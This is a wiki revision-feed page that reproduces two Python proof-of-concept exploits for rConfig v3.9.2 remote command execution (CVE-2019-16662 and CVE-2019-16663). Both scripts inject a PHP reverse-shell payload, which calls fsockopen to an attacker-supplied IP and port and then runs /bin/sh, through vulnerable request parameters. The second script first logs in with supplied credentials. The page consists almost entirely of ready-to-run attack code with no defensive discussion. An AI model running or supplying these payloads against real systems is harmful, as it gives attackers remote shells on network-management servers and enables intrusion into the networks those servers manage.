https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-16662_rConfig_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E CVE-2019-16662 rConfig 遠程命令執行漏洞 - Revision history 2026-04-10T03:19:19Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2019-16662_rConfig_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2469&oldid=prev Pwnwiki: Created page with "==POC1== <pre> #!/usr/bin/python # Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution # Date: 18/09/2019 # Exploit Author: Askar (@mohammadaskar2) # CVE : CV..." 2021-05-05T06:43:11Z <p>Created page with &quot;==POC1== &lt;pre&gt; #!/usr/bin/python # Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution # Date: 18/09/2019 # Exploit Author: Askar (@mohammadaskar2) # CVE : CV...&quot;</p> <p><b>New page</b></p><div>==POC1==<br /> &lt;pre&gt;<br /> #!/usr/bin/python<br /> <br /> # Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution<br /> # Date: 18/09/2019<br /> # Exploit Author: Askar (@mohammadaskar2)<br /> # CVE : CVE-2019-16662<br /> # Vendor Homepage: https://rconfig.com/<br /> # Software link: https://rconfig.com/download<br /> # Version: v3.9.2<br /> # Tested on: CentOS 7.7 / PHP 7.2.22<br /> <br /> import requests<br /> import sys<br /> from urllib import quote<br /> from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /> requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /> <br /> if len(sys.argv) != 4:<br /> print &quot;[+] Usage : ./exploit.py target ip port&quot;<br /> exit()<br /> <br /> target = sys.argv[1]<br /> <br /> ip = sys.argv[2]<br /> <br /> port = sys.argv[3]<br /> <br /> payload = quote(''';php -r '$sock=fsockopen(&quot;{0}&quot;,{1});exec(&quot;/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3&quot;);'#'''.format(ip, port))<br /> <br /> install_path = target + &quot;/install&quot;<br /> <br /> req = requests.get(install_path, verify=False)<br /> if req.status_code == 404:<br /> print &quot;[-] Installation directory not found!&quot;<br /> print &quot;[-] Exploitation failed !&quot;<br /> exit()<br /> elif req.status_code == 200:<br /> print &quot;[+] Installation directory found!&quot;<br /> url_to_send = target + &quot;/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=&quot; + payload<br /> <br /> print &quot;[+] Triggering the payload&quot;<br /> print &quot;[+] Check your listener !&quot;<br /> <br /> requests.get(url_to_send, verify=False)<br /> &lt;/pre&gt;<br /> <br /> <br /> ==POC2==<br /> &lt;pre&gt;<br /> #!/usr/bin/python<br /> <br /> # Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution<br /> # Date: 18/09/2019<br /> # Exploit Author: Askar (@mohammadaskar2)<br /> # CVE : CVE-2019-16663<br /> # Vendor Homepage: https://rconfig.com/<br /> # Software link: https://rconfig.com/download<br /> # Version: v3.9.2<br /> # Tested on: CentOS 7.7 / PHP 7.2.22<br /> <br /> <br /> import requests<br /> import sys<br /> from urllib import quote<br /> from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /> <br /> <br /> requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /> <br /> if len(sys.argv) != 6:<br /> print &quot;[+] Usage : ./exploit.py target username password ip port&quot;<br /> exit()<br /> <br /> target = sys.argv[1]<br /> <br /> username = sys.argv[2]<br /> <br /> password = sys.argv[3]<br /> <br /> ip = sys.argv[4]<br /> <br /> port = sys.argv[5]<br /> <br /> request = requests.session()<br /> <br /> login_info = {<br /> &quot;user&quot;: username,<br /> &quot;pass&quot;: password,<br /> &quot;sublogin&quot;: 1<br /> }<br /> <br /> login_request = request.post(<br /> target+&quot;/lib/crud/userprocess.php&quot;,<br /> login_info,<br /> verify=False,<br /> allow_redirects=True<br /> )<br /> <br /> dashboard_request = request.get(target+&quot;/dashboard.php&quot;, allow_redirects=False)<br /> <br /> <br /> if dashboard_request.status_code == 200:<br /> print &quot;[+] LoggedIn successfully&quot;<br /> payload = '''&quot;&quot;&amp;amp;&amp;amp;php -r '$sock=fsockopen(&quot;{0}&quot;,{1});exec(&quot;/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3&quot;);'#'''.format(ip, port)<br /> encoded_request = target+&quot;/lib/crud/search.crud.php?searchTerm=anything&amp;amp;catCommand={0}&quot;.format(quote(payload))<br /> print &quot;[+] triggering the payload&quot;<br /> print &quot;[+] Check your listener !&quot;<br /> exploit_req = request.get(encoded_request)<br /> <br /> elif dashboard_request.status_code == 302:<br /> print &quot;[-] Wrong credentials !&quot;<br /> exit()<br /> &lt;/pre&gt;</div> Pwnwiki